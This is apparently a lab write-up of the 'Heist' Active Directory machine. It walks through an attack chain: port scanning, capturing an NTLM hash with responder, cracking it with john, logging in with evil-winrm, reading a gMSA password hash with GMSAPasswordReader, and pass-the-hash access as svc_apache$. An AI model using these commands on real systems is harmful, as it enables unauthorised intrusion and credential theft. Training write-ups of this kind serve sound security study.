💝Heist

The initial foothold was capturing NTLM credentials with the responder.

nmap 192.168.235.172

rustscan --addresses 192.168.235.165 --ulimit 5000 -- -A -sC -Pn -sV -T 1500

enum4linux 192.168.235.172

nmap 192.168.235.165 -sVC -A -p- --min-rate 10000

Port 53/tcp: Running Simple DNS Plus.
Port 88/tcp: Microsoft Windows Kerberos for secure authentication.
Port 135/tcp: Microsoft Windows RPC service.
Ports 139/tcp and 445/tcp: Microsoft Windows NetBIOS and possibly Microsoft Directory Services.
Ports 389/tcp, 3268/tcp: Microsoft Windows Active Directory LDAP services.
Port 464/tcp: Potentially for kpasswd5, related to Kerberos.
Port 593/tcp: Microsoft Windows RPC over HTTP.
Port 636/tcp: Likely secured LDAP service (wrapped by TCP).
Port 3269/tcp: Similar to 636/tcp, secured LDAP service (wrapped).
Port 3389/tcp: Microsoft Terminal Services (RDP), with detailed SSL certificate information and RDP NTLM info, indicating the target is a Windows system, specifically ‘DC01’ in the ‘HEIST’ domain.
Port 8080/tcp: Running Werkzeug HTTP server version 2.0.1 with Python 3.9.0. It hosts a web application titled “Super Secure Web Browser”.

Added a record for heist.offsec and dc01.heist.offsec to /etc/hosts file

Try port 8080

Then turning on python http.server on port 80 I visited the url on search url bar and the Directory structure got listed and I also got msg of visit in my http.server terminal.

Now If I turn on responder on my vpn tun0 and try to visit my ip using that. Let’s see what we get.we can try using ntlm_theft - https://github.com/Greenwolf/ntlm_theft

responder -wv -I tun0

I got NTLM hash of some user named enox.

I saved the hash to hash.txt and tried with john to crack.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

evil-winrm -i 192.168.235.165 -u enox -p california

Using this credential. I got access using evil-winrm

Now if I search for txt files I found 2 files.

net users

whoami /priv

bloodhound-python -d heist.offsec -u enox -p california -v --zip -dc heist.offsec -c all -ns 192.168.235.165 - it WAS NOT WORKING

bloodhound-python -d heist.offsec -u enox -p california -v --zip -dc DC01.heist.offsec -c all -ns 192.168.120.165

crackmapexec smb 192.168.226.165

crackmapexec winrm dc01

will continue with evilwinrm

git clone https://github.com/itm4n/PrivescCheck

upload the file

upload PrivescCheck.ps1

PS C:\Users\enox\Documents> . .\PrivescCheck.ps1;Invoke-PrivescCheck -Extended

Privilege Escalation

Option 1:

Download the GMSAPasswordReader.exe to local kali machine and upload to heist machine

GitHub - expl0itabl3/Toolies: Ad hoc collection of Red Teaming & Active Directory tooling.GitHub

GitHub - CsEnox/just-some-stuffGitHub

Download the file to kali linux machine

Upload to Heist Machine

.\GMSAPasswordReader.exe --accountname svc_apache

910B

svc_apache.txt

Open

We’ve obtained the NTLM hash (rc4_hmac) of svc_apache$

try login using evilwinrm and when we try using new Hmac Hash its working

This is the shortest path to domain admin from the owned. We can get there, and luckily SVC_APACHE$ can use PS remote to access the computer. Let’s use Evil-WinRM with it.

rc4_hmac : CAC8E7C043BE5FA304438E362909B953

evil-winrm -i 192.168.167.165 -u svc_apache$ -H CAC8E7C043BE5FA304438E362909B953

let us try to use our tools directory

evil-winrm -i 192.168.167.165 -u svc_apache$ -H CAC8E7C043BE5FA304438E362909B953 -s /root/machines/OSCPTools/Toolies/

will try to view the directory

Now that we have svc_apache$, will see what privileges it possesses and what actions it can perform.

It’s been suggested that we could attempt DCSync to escalate privileges to the domain admin level. However, since we’re not the Administrator, we won’t be able to execute it successfully. We won’t have the privilege to use Mimikatz.